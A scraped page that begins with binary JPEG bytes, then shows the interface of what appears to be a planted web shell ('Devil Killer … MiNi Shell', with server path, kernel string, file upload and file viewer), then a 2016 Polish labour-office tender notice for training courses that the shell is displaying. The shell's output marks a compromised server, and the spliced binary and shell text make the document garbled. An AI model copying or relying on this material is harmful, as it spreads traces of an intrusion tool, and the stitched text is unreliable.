JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160215/33032-N-2016.html

<p class="kh_header"><b>Częstochowa: Przetarg nieograniczony na usługi szkolenia zawodowego: 1. kurs pracownika administracyjno - biurowego z modułem j. angielskiego (poziom podstawowy lub średniozaawansowany - do wyboru) + praktyka u pracodawcy, 2. kurs profesjonalnego sprzedawcy z modułem języka angielskiego na poziomie podstawowym + praktyka u pracodawcy, 3. kurs obsługi wózka jezdniowego z bezpieczną wymianą butli gazowej, 4. kurs spawania podstawowego metodą TIG, MAG, MIG (do wyboru 2 metody) z modułem j. niemieckiego, 5. kurs kwalifikacji wstępnej przyspieszonej dla kierowców wykonujących transport drogowy</b><br>
<b>Numer ogłoszenia: 33032 - 2016; data zamieszczenia: 15.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Częstochowie , ul. Szymanowskiego 15, 42-200 Częstochowa, woj. śląskie, tel. 034 3706100 w. 186, faks 034 3243130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na usługi szkolenia zawodowego: 1. kurs pracownika administracyjno - biurowego z modułem j. angielskiego (poziom podstawowy lub średniozaawansowany - do wyboru) + praktyka u pracodawcy, 2. kurs profesjonalnego sprzedawcy z modułem języka angielskiego na poziomie podstawowym + praktyka u pracodawcy, 3. kurs obsługi wózka jezdniowego z bezpieczną wymianą butli gazowej, 4. kurs spawania podstawowego metodą TIG, MAG, MIG (do wyboru 2 metody) z modułem j. niemieckiego, 5. kurs kwalifikacji wstępnej przyspieszonej dla kierowców wykonujących transport drogowy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA Część I zamówienia: Przedmiotem zamówienia jest przeprowadzenie szkolenia dla osób uprawnionych zarejestrowanych jako osoby bezrobotne w Powiatowym Urzędzie Pracy w Częstochowie w następującym kierunku: kurs pracownika administracyjno - biurowego z modułem języka angielskiego (poziom podstawowy lub średniozaawansowany - do wyboru) + praktyka u pracodawcy w wymiarze 100 godzin UWAGA:	PLANOWANE TERMINY KURSU MOGĄ ULEC ZMIANIE, Z ZASTRZEŻENIEM, IŻ KURSY MUSZĄ ZAKOŃCZYĆ SIĘ W NIEPRZEKRACZALNYM TERMINIE DO 30.11.2016r. Kod CPV - 80530000-8 - usługi szkolenia zawodowego. Przewidziano przeszkolenie 20 osób bezrobotnych. 
Szkolenie będzie finansowane ze środków Funduszu Pracy
1. Liczba osób i czas trwania szkolenia. Zamawiający planuje przeszkolić osoby w trzech następujących grupach: I grupa  -  termin rozpoczęcia szkolenia marzec 2016 r. - 10 osób, II grupa -  termin  rozpoczęcia szkolenia maj 2016 r.  - 10 osób, Ostatnia grupa musi zakończyć szkolenie w nieprzekraczalnym terminie do 30.11.2016r. 2.	 Liczba godzin szkolenia. Należy przedstawić szczegółowy program wszystkich zajęć obejmujący minimum 316 godzin dydaktycznych przeznaczonych dla jednego uczestnika szkolenia oraz 100 godzin zegarowych zajęć praktycznych u pracodawcy. Jedna godzina dydaktyczna odpowiada 45 minutom. OPIS PRZEDMIOTU ZAMÓWIENIA Część II zamówienia: Przedmiotem zamówienia jest przeprowadzenie szkoleń dla osób uprawnionych zarejestrowanych jako bezrobotne w Powiatowym Urzędzie Pracy w Częstochowie oraz  dla osób uprawnionych zarejestrowanych jako bezrobotne w Gminnym Centrum Pracy w Koniecpolu w następującym kierunku:
kurs profesjonalnego  sprzedawcy z modułem języka angielskiego na poziomie podstawowym + praktyka u pracodawcy w wymiarze 100 godzin UWAGA: PLANOWANE TERMINY KURSU  MOGĄ ULEC ZMIANIE, Z ZASTRZEŻENIEM, IŻ KURSY MUSZĄ ZAKOŃCZYĆ SIĘ W NIEPRZEKRACZALNYM TERMINIE DO 30.11.2016r. Kod CPV - 80530000-8 - usługi szkolenia zawodowego.
Przewidziano przeszkolenie 22 osób bezrobotnych, w tym 20 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Częstochowie oraz 2 osoby zarejestrowane w Gminnym Centrum Pracy w Koniecpolu.
1. Liczba osób i czas trwania szkolenia. Zamawiający planuje przeszkolić osoby w dwóch następujących grupach: I grupa  -  termin rozpoczęcia szkolenia marzec 2016r. - 10 osób (Powiatowy Urząd Pracy w Częstochowie), II grupa -  termin  rozpoczęcia szkolenia wrzesień 2016r.  - 12 osób (10 osób Powiatowy Urząd Pracy w Częstochowie + 2 osoby Gminne Centrum Pracy w Koniecpolu)
Ostatnia grupa musi zakończyć szkolenie w nieprzekraczalnym terminie do 30.11.2016 r. 2.	 Liczba godzin szkolenia. Należy przedstawić szczegółowy program wszystkich zajęć obejmujący minimum 306 godzin dydaktycznych przeznaczonych dla jednego uczestnika szkolenia oraz 100 godzin zegarowych zajęć praktycznych u pracodawcy. Jedna godzina dydaktyczna odpowiada 45 minutom. OPIS PRZEDMIOTU ZAMÓWIENIA Część III zamówienia: Przedmiotem zamówienia jest przeprowadzenie szkoleń dla osób uprawnionych zarejestrowanych jako bezrobotne w Powiatowym Urzędzie Pracy w Częstochowie oraz dla osób uprawnionych zarejestrowanych jako bezrobotne w Gminnym Centrum Pracy w Koniecpolu w następującym kierunku: kurs obsługi wózka jezdniowego z bezpieczną wymianą butli gazowej. UWAGA:	PLANOWANE TERMINY KURSÓW MOGĄ ULEC ZMIANIE, Z ZASTRZEŻENIEM, IŻ KURSY MUSZĄ ZAKOŃCZYĆ SIĘ W NIEPRZEKRACZALNYM TERMINIE DO 30.11.2016 r.
Kod CPV - 80530000-8 -usługi szkolenia zawodowego.
Przewidziano przeszkolenie 32 osób bezrobotnych, w tym 30 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Częstochowie oraz 2 osób zarejestrowanych w Gminnym Centrum Pracy w Koniecpolu.
Szkolenie będzie finansowane ze środków Funduszu Pracy.
1. Liczba osób i czas trwania szkolenia. Zamawiający planuje przeszkolić osoby w trzech grupach: I grupa  -  termin rozpoczęcia szkolenia marzec 2016 r. - 10 osób (Powiatowy Urząd Pracy w Częstochowie), II grupa -  termin  rozpoczęcia szkolenia maj 2016 r.  - 10 osób ( Powiatowy Urząd Pracy w Częstochowie),
III grupa -  termin  rozpoczęcia szkolenia wrzesień 2016 r.  - 12 osób (10 osób Powiatowy Urząd Pracy w Częstochowie + 2 osoby Gminne Centrum Pracy w Koniecpolu). Ostatnia grupa musi zakończyć szkolenie w nieprzekraczalnym terminie do 30.11.2016 r. 2.  Liczba godzin szkolenia. Należy przedstawić szczegółowy program wszystkich zajęć obejmujący minimum 60 godzin dydaktycznych przeznaczonych dla jednego uczestnika Szkolenia.  Jedna godzina dydaktyczna odpowiada 45 minutom. OPIS PRZEDMIOTU ZAMÓWIENIA Część IV zamówienia: Przedmiotem zamówienia jest przeprowadzenie szkoleń dla osób uprawnionych zarejestrowanych jako bezrobotne w Powiatowym Urzędzie Pracy w Częstochowie oraz dla osób uprawnionych zarejestrowanych jako bezrobotne w Gminnym Centrum Pracy w Koniecpolu w następującym kierunku: kurs spawania podstawowego (metoda TIG, MAG, MIG) do wyboru 2 metody z 3 w/w) z modułem języka niemieckiego na poziomie podstawowym. UWAGA: PLANOWANE TERMINY KURSÓW MOGĄ ULEC ZMIANIE, Z ZASTRZEŻENIEM, IŻ KURSY MUSZĄ ZAKOŃCZYĆ SIĘ W NIEPRZEKRACZALNYM TERMINIE DO 30.11.2016 r. Kod CPV - 80530000-8 -usługi szkolenia zawodowego. Przewidziano przeszkolenie 32 osób bezrobotnych, w tym 30 osób zarejestrowanych w Powiatowym Urzędzie Pracy w Częstochowie oraz 2 osób zarejestrowanych w Gminnym Centrum Pracy w Koniecpolu.
Szkolenie będzie finansowane ze środków Funduszu Pracy. 1. Liczba osób i czas trwania szkolenia. Zamawiający planuje przeszkolić osoby w trzech grupach: I grupa  -  termin rozpoczęcia szkolenia marzec 2016 r. - 10 osób (Powiatowy Urząd Pracy w Częstochowie), II grupa -  termin  rozpoczęcia szkolenia maj 2016 r.  - 12 osób (10 osób Powiatowy Urząd Pracy w Częstochowie + 2 osoby Gminne Centrum Pracy w Koniecpolu), III grupa -  termin  rozpoczęcia szkolenia wrzesień 2016 r.  - 10 osób (Powiatowy Urząd Pracy w Częstochowie).
W jednej grupie mogą uczestniczyć osoby, które szkolą się w zakresie różnych metod. Jedna osoba skierowana przez Zamawiającego może uczestniczyć w zakresie dwóch wcześniej wybranych metod. Ostatnia grupa musi zakończyć szkolenie w nieprzekraczalnym terminie do 30.11.2016 r. 2. Liczba godzin szkolenia. Należy przedstawić szczegółowy program wszystkich zajęć obejmujący minimum 356 godzin dydaktycznych przeznaczonych dla jednego uczestnika szkolenia (w tym 96 godzin języka niemieckiego na poziomie podstawowym). Jedna godzina dydaktyczna odpowiada 45 minutom. 
OPIS PRZEDMIOTU ZAMÓWIENIA Część V zamówienia: Przedmiotem zamówienia jest przeprowadzenie szkoleń dla osób uprawnionych zarejestrowanych jako bezrobotne w Powiatowym Urzędzie Pracy w Częstochowie w następującym kierunku: kurs kwalifikacji wstępnej przyspieszonej dla kierowców wykonujących transport drogowy rzeczy lub osób
UWAGA:	PLANOWANE TERMINY KURSU MOGĄ ULEC ZMIANIE, Z ZASTRZEŻENIEM, IŻ KURSY MUSZĄ ZAKOŃCZYĆ SIĘ W NIEPRZEKRACZALNYM TERMINIE DO 30.11.2016 R. Kod CPV - 80530000-8 -usługi szkolenia zawodowego. Przewidziano przeszkolenie 15 osób bezrobotnych. 
1. Liczba osób i czas trwania szkolenia. Zamawiający planuje przeszkolić osoby w dwóch następujących grupach: I grupa  -  termin rozpoczęcia szkolenia kwiecień 2016r. - 8 osób II grupa -  termin  rozpoczęcia szkolenia czerwiec 2016 r.  - 7 osób Ostatnia grupa musi zakończyć szkolenie w nieprzekraczalnym terminie do 30.11.2016r. W jednej grupie mogą uczestniczyć osoby, które szkolą się w zakresie kwalifikacji wstępnej przyspieszonej do kat. C, C+E, C1, C1+E lub do kat. D, D+E D1, D1+E.  2. Liczba godzin szkolenia. Należy przedstawić szczegółowy program wszystkich zajęć obejmujący minimum 300 godzin dydaktycznych przeznaczonych dla jednego uczestnika szkolenia. Jedna godzina dydaktyczna odpowiada 45 minutom..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia dotychczasowemu wykonawcy usług zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy - Prawo zamówień publicznych. Zamówienie uzupełniające będzie dotyczyło przedmiotu zamówienia podstawowego i polegać będzie na powtórzeniu tego samego rodzaju zamówień do wysokości 50 % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku - dotyczy każdej części zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla każdej części zamówienia warunek ten Zamawiający sprecyzował odrębnie.
Część I zamówienia - kurs pracownika administracyjno - biurowego z modułem języka angielskiego (poziom podstawowy lub średniozaawansowany - do wyboru) + praktyka u pracodawcy w wymiarze 100 godzin. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, zrealizował co najmniej następujące szkolenie:
jedno szkolenie grupowe z zakresu pracownika administracyjno - biurowego,
pracownika biurowego lub sekretarki oraz, że usługa ta została wykonana      należycie. Za szkolenie grupowe Zamawiający uzna szkolenie, w którym brało udział minimum pięć osób. Część II zamówienia - kurs profesjonalnego sprzedawcy z modułem języka angielskiego na poziomie podstawowym + praktyka u pracodawcy w wymiarze 100 godzin. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, zrealizował co najmniej następujące szkolenie:      jedno szkolenie grupowe z zakresu profesjonalnego sprzedawcy oraz, że usługa ta została wykonana należycie. Za szkolenie grupowe Zamawiający uzna szkolenie, w którym brało udział minimum pięć osób. Część III zamówienia - 
kurs obsługi wózka jezdniowego z bezpieczną wymianą butli gazowej.
Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, zrealizował co najmniej następujące szkolenie: jedno szkolenie grupowe z zakresu obsługi wózka jezdniowego oraz, że usługa ta została wykonana należycie. Za szkolenie grupowe Zamawiający uzna szkolenie, w którym brało udział minimum pięć osób. Część IV zamówienia - kurs spawania podstawowego metodą TIG, MAG, MIG (do wyboru 2 metody z 3 w/w) z modułem języka niemieckiego na poziomie podstawowym. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, zrealizował co najmniej następujące szkolenie: jedno szkolenie grupowe z zakresu spawania podstawowego (metoda dowolna) oraz, że usługa ta została wykonana należycie. Za szkolenie grupowe Zamawiający uzna szkolenie, w którym brało udział minimum pięć osób. Część V zamówienia - kurs kwalifikacji wstępnej przyspieszonej dla kierowców wykonujących transport drogowy rzeczy lub osób. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, zrealizował co najmniej następujące szkolenie: jedno szkolenie grupowe z zakresu kwalifikacji wstępnej przyspieszonej dla kierowców wykonujących transport drogowy oraz, że usługa ta została wykonana należycie. Za szkolenie grupowe Zamawiający uzna szkolenie, w którym brało udział minimum pięć osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla każdej części zamówienia warunek ten Zamawiający sprecyzował odrębnie.
Część I zamówienia - kurs pracownika administracyjno - biurowego z modułem języka angielskiego (poziom podstawowy lub średniozaawansowany - do wyboru) + praktyka u pracodawcy w wymiarze 100 godzin. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje   do przeprowadzenia kursu następującym potencjałem technicznym: minimum dziesięcioma stanowiskami komputerowymi z dostępem do Internetu oraz wyposażonymi w: Windows XP lub równoważny, pakiet MS Office lub równoważny. Część II zamówienia - kurs profesjonalnego sprzedawcy z modułem języka angielskiego na poziomie podstawowym + praktyka u pracodawcy w wymiarze 100 godzin. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje   do przeprowadzenia kursu następującym potencjałem technicznym: minimum dwunastoma stanowiskami komputerowymi z dostępem do Internetu oraz wyposażonymi w: Windows XP lub równoważny, pakiet MS Office lub równoważny; minimum dwunastoma kasami fiskalnymi, w tym minimum cztery z terminalem kart płatniczych.
Część III zamówienia - kurs obsługi wózka jezdniowego z bezpieczną wymianą butli gazowej. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje do przeprowadzenia kursu następującym potencjałem technicznym: minimum trzema wózkami jezdniowymi. Część IV zamówienia - 
kurs spawania podstawowego metodą TIG, MAG, MIG (do wyboru 2 metody z 3 w/w) z modułem języka niemieckiego na poziomie podstawowym. Zamawiający nie precyzuje warunku. Część V zamówienia - kurs kwalifikacji wstępnej przyspieszonej dla kierowców wykonujących transport drogowy rzeczy lub osób.
Zamawiający nie precyzuje warunku.


d) Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla każdej części zamówienia warunek ten Zamawiający sprecyzował odrębnie.
Część I zamówienia - kurs pracownika administracyjno - biurowego z modułem języka angielskiego (poziom podstawowy lub średniozaawansowany - do wyboru) + praktyka u pracodawcy w wymiarze 100 godzin. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje do przeprowadzenia kursu następującą/-cymi osobą/-ami: Osoba, która prowadzi dany moduł szkolenia, spośród następujących: obsługa sekretariatu, obsługa komputera, sporządzanie dokumentacji kadrowo - płacowej, język angielski
musi posiadać doświadczenie w postaci przeprowadzonego minimum jednego szkolenia grupowego (tj. dla minimum pięciu osób) w tym module w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia szkoleń jest krótszy, to w tym okresie. Zamawiający dopuszcza możliwość prowadzenia przez jedną osobę więcej niż jednego modułu, jednakże zgodnie z w/w warunkiem osoba taka musi posiadać doświadczenie w postaci przeprowadzonego minimum jednego szkolenia grupowego (tj. dla minimum pięciu osób) we wszystkich prowadzonych przez siebie modułach w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia szkoleń jest krótszy, to w tym okresie. Część II zamówienia - kurs profesjonalnego sprzedawcy z modułem języka angielskiego na poziomie podstawowym + praktyka u pracodawcy w wymiarze 100 godzin. Zamawiający 
uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje do przeprowadzenia kursu następującą/-cymi osobą/-ami: Osoba, która prowadzi dany moduł szkolenia, spośród następujących: obsługa klienta, obsługa komputera, obsługa kas fiskalnych, obsługa terminala kart płatniczych, telemarketing, fakturowanie, merchandising, język angielski musi posiadać doświadczenie w postaci przeprowadzonego minimum jednego szkolenia grupowego (tj. dla minimum pięciu osób) w tym module w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia szkoleń jest krótszy, to w tym okresie. Zamawiający dopuszcza możliwość prowadzenia przez jedną osobę więcej niż jednego modułu, jednakże zgodnie z w/w warunkiem osoba taka musi posiadać doświadczenie w postaci przeprowadzonego minimum jednego szkolenia grupowego (tj. dla minimum pięciu osób) we wszystkich prowadzonych przez siebie modułach w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia szkoleń jest krótszy, to w tym okresie. Część III zamówienia - kurs obsługi wózka jezdniowego z bezpieczną wymianą butli gazowej. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje do przeprowadzenia kursu następującą/-cymi osobą/-ami: Osoba, która prowadzi moduł szkolenia z zakresu:	obsługi wózka jezdniowego musi posiadać doświadczenie w postaci przeprowadzonego minimum jednego szkolenia grupowego (tj. dla minimum pięciu osób) w tym module w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia szkoleń jest krótszy, to w tym okresie. Część IV zamówienia - kurs spawania podstawowego metodą TIG, MAG, MIG (do wyboru 2 metody z 3 w/w) z modułem języka niemieckiego na poziomie podstawowym. Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż dysponuje do przeprowadzenia kursu następującą/-cymi osobą/-ami: Osoba, która prowadzi dany moduł szkolenia, spośród następujących: zajęcia przygotowujące uczestników do egzaminu w zakresie  podstawowego spawania (metoda TIG, MAG, MIG), język niemiecki musi posiadać doświadczenie w postaci przeprowadzonego minimum jednego szkolenia grupowego (tj. dla minimum pięciu osób) w tym module w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia szkoleń jest krótszy, to w tym okresie. Zamawiający dopuszcza możliwość prowadzenia przez jedną osobę więcej niż jednego modułu, jednakże zgodnie z w/w warunkiem osoba taka musi posiadać doświadczenie w postaci przeprowadzonego minimum jednego szkolenia grupowego (tj. dla minimum pięciu osób) we wszystkich prowadzonych przez siebie modułach w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia szkoleń jest krótszy, to
w tym okresie. Część V zamówienia - kurs kwalifikacji wstępnej przyspieszonej dla kierowców wykonujących transport drogowy rzeczy lub osób. Zamawiający nie precyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku - dotyczy każdej części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

